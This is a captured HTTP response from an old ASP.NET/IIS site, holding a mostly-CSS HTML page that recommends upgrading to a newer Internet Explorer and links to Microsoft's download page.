Server: Microsoft-IIS/6.0
www.ari-allternet.com:
X-Powered-By: ASP.NET
Content-Length: 4477
Content-Type: text/html
Expires: Wed, 09 Mar 2011 20:22:50 GMT
Set-Cookie: ASPSESSIONIDSQRSBDBT=KNODLHGAELOPNIBPDDPPKNCC; path=/
Cache-control: private



<html>
<head>
<META HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE" NAME="GENERATOR" Content="Microsoft Visual Studio 6.0">
<title>Browser recommendations</title>
<STYLE type="text/css">
.headerTxt
{
FONT-WEIGHT: bold;
FONT-SIZE: 13pt;
COLOR: #262626;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arieal;
font_Size: 16pt
}
.titleTxt
{
FONT-WEIGHT: bold;
FONT-SIZE: 11pt;
COLOR: #262626;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial
}
.labelTxt
{
FONT-WEIGHT: bold;
FONT-SIZE: 12pt;
COLOR: black;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial
}
.fieldTxt
{
FONT-WEIGHT: normal;
FONT-SIZE: 7pt;
COLOR: #000099;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial
BORDER-RIGHT: #78263a 1px solid;
BORDER-TOP: #78263a 1px solid;
BACKGROUND: #ffffff;
BORDER-LEFT: #78263a 1px solid;
BORDER-BOTTOM: #78263a 1px solid;
}
.blackfieldTxt
{
FONT-WEIGHT: normal;
FONT-SIZE: 11pt;
COLOR: #000000;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial
}
.greyfieldTxt
{
FONT-WEIGHT: normal;
FONT-SIZE: 11pt;
COLOR: #999999;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial
}
.redfieldTxt
{
FONT-WEIGHT: normal;
FONT-SIZE: 9pt;
COLOR: red;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial
}
.smallTxt
{
FONT-SIZE: 7pt;
COLOR: #262626;
FONT-STYLE: normal;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial
}
.bluefieldTxt
{
FONT-WEIGHT: normal;
FONT-SIZE: 11pt;
COLOR: #0000ff;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial
}
.activetableTxt
{
FONT-WEIGHT: bold;
FONT-SIZE: 11pt;
COLOR: #0000ff;
FONT-FAMILY: 'MS Sans Serif', Verdana, Helvetica, Ariel;
BACKGROUND-COLOR: #cccccc
}
.notactivetableTxt
{
FONT-WEIGHT: bold;
FONT-SIZE: 10pt;
COLOR: #0000ff;
FONT-FAMILY: 'MS Sans Serif', Verdana, Ariel;
BACKGROUND-COLOR: #0000ff
}
.errorTxt
{
FONT-WEIGHT: normal;
FONT-SIZE: 8pt;
COLOR: red;
FONT-FAMILY: 'MS Sans Serif', Arial, Verdana
}
.ageneralblue
{
FONT-SIZE: 11pt;
COLOR: #0000ff;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial
}
.ageneralblue:hover
{
FONT-SIZE: 11pt;
COLOR: #333399;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial;
TEXT-DECORATION: underline
}
.ageneralblue:active
{
FONT-SIZE: 11pt;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial
}

.awhitebold
{
FONT-WEIGHT: bold;
FONT-SIZE: 11pt;
COLOR: #ffffff;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial
}
.awhitebold:hover
{
FONT-WEIGHT: bold;
FONT-SIZE: 11pt;
COLOR: #ccccff;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial;
TEXT-DECORATION: underline
}
.awhitebold:active
{
FONT-SIZE: 11pt;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial;
font_weight: bold
}


A.ageneral:link {
color: #8E0D34;
size: 11pt;
text-decoration: none;
family: 'MS Sans Serif', Verdana, Arial;
}
A.ageneral:visited {
color: #8E0D34;
size: 11pt;
text-decoration: none;
family: 'MS Sans Serif', Verdana, Arial;
}
A.ageneral:hover {
color: #8E0D34;
size: 11pt;
text-decoration: underline;
family: 'MS Sans Serif', Verdana, Arial;
}

A.ageneralbold:link {
color: #8E0D34;
size: 11pt;
text-decoration: none;
family: 'MS Sans Serif', Verdana, Arial;
weight: bold;
}
A.ageneralbold:visited {
color: #8E0D34;
size: 11pt;
text-decoration: none;
family: 'MS Sans Serif', Verdana, Arial;
weight: bold;
}
A.ageneralbold:hover {
color: #8E0D34;
size: 11pt;
text-decoration: underline;
family: 'MS Sans Serif', Verdana, Arial;
weight: bold;
}

table
{
border-color: #78263a;
}
</style>



</head>

<BODY>
<center>
<p>
<table style="testStyle" width="90%">
<tr>
<td>
<h2> Browser Recommednations: </h2>
</td>
</tr>
<p>
<p>
<tr>
<td class = "titleTxt">
<h3>This site was optimized for use with Microsoft&reg; Internet Explorer
4.0 or higher. In order to user this application you need to install more up-to-date version of Internet Explorer.&nbsp;&nbsp;</h3>

<br>
To install the newest version of Microsoft Internet Explorer go to:&nbsp;&nbsp;
<a class = "ageneral" target = "_self" href = "https://www.microsoft.com/downloads/search.asp">Download Internet Explorer</a>

</td>
</tr>
</table>
</center>
<p>
<hr>
</BODY>
</HTML>